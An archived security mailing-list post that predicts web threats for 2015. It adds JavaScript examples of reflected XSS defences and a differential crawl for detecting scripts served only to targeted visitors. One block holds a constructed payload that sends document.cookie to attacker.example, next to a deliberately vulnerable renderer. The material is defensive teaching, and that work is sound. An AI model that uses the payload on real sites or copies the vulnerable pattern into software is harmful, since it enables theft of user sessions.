BreachExchange mailing list archives

Four cyber security risks not to be taken for granted


From: Audrey McNeil <audrey () riskbasedsecurity com>
Date: Tue, 6 Jan 2015 19:23:59 -0700

http://net-security.org/article.php?id=2192

It's pretty difficult to make information security predictions, and even
more difficult to verify them afterwards: the effectiveness of information
security can only be judged by the number of security incidents that become
public, while the majority of data breaches remain undetected.

However, we can try to make some web security predictions based on common
sense profitability (profit/cost ratio) for hackers:

1. XSS will become a more frequent and dangerous vector of attacks

It's very difficult to find high or critical risk vulnerabilities in the core
of well-known web products (e.g. Joomla, WordPress, SharePoint, etc). However,
low and medium risk vulnerabilities such as XSS will keep appearing regularly.
Because an XSS payload runs in the victim's browser, inside the victim's
session, sophisticated exploitation can give the same outcome as an SQL
injection vulnerability: theft of the victim's data, or actions performed on
the victim's behalf with their privileges. Hackers will therefore rely on XSS
attacks more and more to achieve their goals.
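As an added example (not code from the article), the classic reflected XSS
shape: a search page that concatenates a query parameter into HTML, next to
the hardened version that encodes the value for its HTML context. The route,
the parameter name `q`, the cookie name and the attacker host are hypothetical,
and the payload shown is a constructed one that ships `document.cookie` to a
third party. The headers function shows the two defence-in-depth controls
that shrink what a successful XSS can still do.

```javascript
// Added example: reflected XSS, vulnerable rendering vs hardened rendering.
// Hypothetical app; "q", the cookie name and attacker.example are assumptions.

const SAMPLE_QUERY = 'shoes'; // constructed benign input

// Constructed attacker input: an inline script that exfiltrates the
// document's cookies to an attacker-controlled host (placeholder name).
const XSS_PAYLOAD =
  '<script>new Image().src="https://attacker.example/c?"' +
  '+encodeURIComponent(document.cookie)</script>';

// Vulnerable: untrusted input is concatenated straight into HTML, so any
// markup in q becomes part of the page and runs in the user's session.
function renderSearchVulnerable(q) {
  return `<html><body><h1>Results for ${q}</h1></body></html>`;
}

// Output encoding for HTML text and double-quoted attribute contexts.
function escapeHtml(s) {
  const map = {
    '&': '&amp;', '<': '&lt;', '>': '&gt;',
    '"': '&quot;', "'": '&#x27;', '/': '&#x2F;',
  };
  return String(s).replace(/[&<>"'/]/g, (c) => map[c]);
}

// Hardened: the same template, but every untrusted value is encoded for the
// context it lands in, so a payload is displayed as text rather than parsed.
function renderSearchHardened(q) {
  return `<html><body><h1>Results for ${escapeHtml(q)}</h1></body></html>`;
}

// Cheap regression check for a test suite: does the rendered page contain a
// script element that the template itself never emits?
function containsInjectedScript(html) {
  return /<script\b/i.test(html);
}

// Defence in depth for the case where encoding is missed somewhere:
// HttpOnly keeps document.cookie empty for injected script, and a CSP
// without 'unsafe-inline' refuses to execute inline script at all.
function securityHeaders() {
  return {
    'Set-Cookie': 'session=<value>; HttpOnly; Secure; SameSite=Lax',
    'Content-Security-Policy':
      "default-src 'self'; script-src 'self'; object-src 'none'",
  };
}

// Stand-alone demonstration.
console.log('vulnerable page executes payload:',
  containsInjectedScript(renderSearchVulnerable(XSS_PAYLOAD)));
console.log('hardened page executes payload:',
  containsInjectedScript(renderSearchHardened(XSS_PAYLOAD)));
console.log(renderSearchHardened(SAMPLE_QUERY));
```

Note that the CSP and HttpOnly flag do not fix the injection; they only
limit the blast radius once script does run. The fix is the encoding in
`renderSearchHardened`, and it has to be applied per output context (HTML
body, attribute, URL, JavaScript string), which is why template engines with
auto-escaping are preferable to hand-rolled concatenation.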

2. Third-party code and plugins will remain the Achilles' Heel of web
applications

While the core code of well-known CMSs and other web products is fairly
secure today, third-party code such as plugins or extensions remains
vulnerable, including to high-risk vulnerabilities. People tend to forget
that a single outdated plugin or third-party voting script endangers the
entire web application, because it runs with the same privileges and in the
same origin as the core. Obviously hackers will not miss such opportunities.

3. Chained attacks via third-party websites will grow

Nowadays, it's pretty difficult to find a critical vulnerability on a
well-known website. It is much quicker, and thus cheaper, for hackers to
find several medium risk vulnerabilities that in combination give complete
access to the website. Another trend is to attack a reputable website that
the victim regularly visits. For example, when targeting a C-level
executive, hackers may compromise several high-profile financial websites
or newspapers and insert an exploit pack that activates only for a specific
combination of IP address, user-agent and authentication cookie belonging to
the victim. Such attacks are very difficult to detect, because only the
victim is ever served the malicious content; a scanner or an analyst visiting
the same page sees the clean version.
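Since the malicious content is served only to the targeted profile, one
practical check is a differential crawl: fetch the page as a generic visitor,
fetch it again impersonating the protected user's profile (their egress IP
via a proxy, their user-agent, a decoy session cookie), and diff the scripts
the two responses load. The block below is an added example of that diff
logic, not something from the article; `fetchAs` is a stand-in for a real
HTTP client and returns two constructed responses, and the profile values and
the CDN host are placeholders.

```javascript
// Added example: differential crawl to surface selectively served scripts.
// A kit that activates only for one IP/user-agent/cookie combination is
// invisible to a generic scanner, but a diff between the page fetched with a
// baseline profile and the page fetched with the target's profile exposes it.
// All inputs are constructed; fetchAs() stands in for a proxied HTTP fetch.

const TARGET_PROFILE = {              // placeholder values for the protected user
  ip: '203.0.113.7',
  ua: 'Mozilla/5.0 (Windows NT 6.1; WOW64) Target/1.0',
  cookie: 'sid=decoy-session',
};

const GENERIC_PROFILE = { ip: '198.51.100.2', ua: 'Mozilla/5.0 Generic/1.0', cookie: '' };

// Page as served to everyone else.
const BASELINE_HTML = `<html><head><script src="/js/app.js"></script></head>
<body><h1>Markets</h1><script>trackPage("markets")</script></body></html>`;

// Same page as served to the targeted profile: one extra script tag.
const TARGETED_HTML = `<html><head><script src="/js/app.js"></script>
<script src="//cdn.example/s/l.js"></script></head>
<body><h1>Markets</h1><script>trackPage("markets")</script></body></html>`;

// Stand-in for fetching the URL through the profile's IP with its UA/cookie.
// A real implementation would use an HTTP client behind a proxy exit.
function fetchAs(profile) {
  const matchesTarget = profile.ip === TARGET_PROFILE.ip &&
    profile.ua === TARGET_PROFILE.ua && profile.cookie === TARGET_PROFILE.cookie;
  return matchesTarget ? TARGETED_HTML : BASELINE_HTML;
}

// Reduce a response to the set of scripts it would execute: external ones by
// src, inline ones by their (trimmed) body.
function extractScripts(html) {
  const scripts = new Set();
  const re = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const src = /src\s*=\s*["']([^"']+)["']/i.exec(m[1]);
    scripts.add(src ? `src:${src[1]}` : `inline:${m[2].trim()}`);
  }
  return scripts;
}

// Scripts present in the probe response but absent from the baseline.
function diffScripts(baselineHtml, probeHtml) {
  const base = extractScripts(baselineHtml);
  return [...extractScripts(probeHtml)].filter((s) => !base.has(s));
}

// The check itself: anything extra served to the target profile is a finding.
function checkForCloaking(targetProfile, genericProfile) {
  return diffScripts(fetchAs(genericProfile), fetchAs(targetProfile));
}

console.log('extra scripts served to target:',
  checkForCloaking(TARGET_PROFILE, GENERIC_PROFILE));
```

The diff is deliberately coarse (script sources and inline bodies only); in
practice one would also compare iframes, object/embed tags and redirects, and
repeat the fetch over time, since kits commonly arm themselves only during a
short window. The decoy cookie matters: a kit keyed on the real session cookie
will not fire for a fake one, so the probe should reuse a cookie the
protected user actually holds, issued for this purpose.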

4. Automated security tools and solutions will no longer be effective on their own

Web Application Firewalls, Web Vulnerability Scanners and Malware Detection
services will no longer be effective if used in isolation or without human
oversight. Both web vulnerabilities and web attacks are becoming more
sophisticated and harder to detect, and human intervention is almost always
necessary to find all of the vulnerabilities. It's not enough to patch 90%
or even 99% of them: hackers will find the last vulnerability and use it to
compromise the entire website.
_______________________________________________
Dataloss Mailing List (dataloss () datalossdb org)
Archived at http://seclists.org/dataloss/
Unsubscribe at http://lists.osvdb.org/mailman/listinfo/dataloss
For inquiries regarding use or licensing of data, e-mail
        sales () riskbasedsecurity com 

Supporters:

Risk Based Security (http://www.riskbasedsecurity.com/)
YourCISO is an affordable SaaS solution that provides a comprehensive information security program that ensures focus 
on the right security.  If you need security help or want to provide real risk reduction for your clients contact us!
